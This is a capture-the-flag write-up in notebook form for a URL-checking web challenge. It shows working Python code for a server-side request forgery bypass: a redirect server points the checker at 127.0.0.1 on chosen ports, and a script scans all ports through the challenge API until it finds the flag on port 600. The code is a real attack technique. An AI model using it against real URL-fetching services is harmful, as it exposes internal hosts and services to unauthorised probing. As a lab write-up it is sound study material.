# Super Website Verificator 3000

Our team of brilliant engineers has developed a highly sophisticated website designed to perform check-ups on other sites. It can even uncover hidden information, possibly concealed by some clever tricksters. Take a look and see if you can find anything!

The problem with the 169.254 subnet was fixed, it was a security issue with the infrastructure.


## Observations:
- The website is a simple form that takes a URL as input and returns the content of the website, if it is online.
- It follows redirects.
- It forbids ip adresses in the URL and non-http/https protocols.
- It resolves domain names and check that ip adress is not 127.0.0.1.

## Approach:
- Generate a webserver that redirects to the local ip address, with a specific port, then script a remote "nmap".

In [ ]:
# Web server that redirects to a specified port

from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Parse the query parameters
        parsed_url = urlparse(self.path)
        if parsed_url.path == "/red":
            query_params = parse_qs(parsed_url.query)
            port = query_params.get("port", [None])[0]

            if port and port.isdigit():
                # Redirect to http://127.0.0.1:$port
                target_url = f"http://127.0.0.1:{port}"
                self.send_response(302)
                self.send_header("Location", target_url)
                self.end_headers()
            else:
                # Bad request if port is not provided or invalid
                self.send_response(400)
                self.end_headers()
                self.wfile.write(b"Invalid or missing port parameter")
        else:
            # Not Found for other paths
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"Not Found")

    def log_message(self, format, *args):
        # Override to suppress default logging
        pass

if __name__ == "__main__":
    host = ""
    port = 9000
    server = HTTPServer((host, port), RedirectHandler)
    print(f"Starting server on {host}:{port}")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nShutting down server...")
        server.server_close()


Remote nmap:

In [1]:
import requests

submiturl = "http://challenges.hackday.fr:43244/api/check"

def submit(url):
    r = requests.post(submiturl, data= {
        "url": url,
        "showBody": "on"
    })
    return r.json()

for i in range(65536):
    url = "http://b29d6b52.merll.EU:9000/red?port={}".format(i)
    sub = submit(url)
    if sub['online']: print(url)

http://b29d6b52.merll.EU:9000/red?port=80
http://b29d6b52.merll.EU:9000/red?port=600


KeyboardInterrupt: 

The flag is in the response of the API for the 600 port.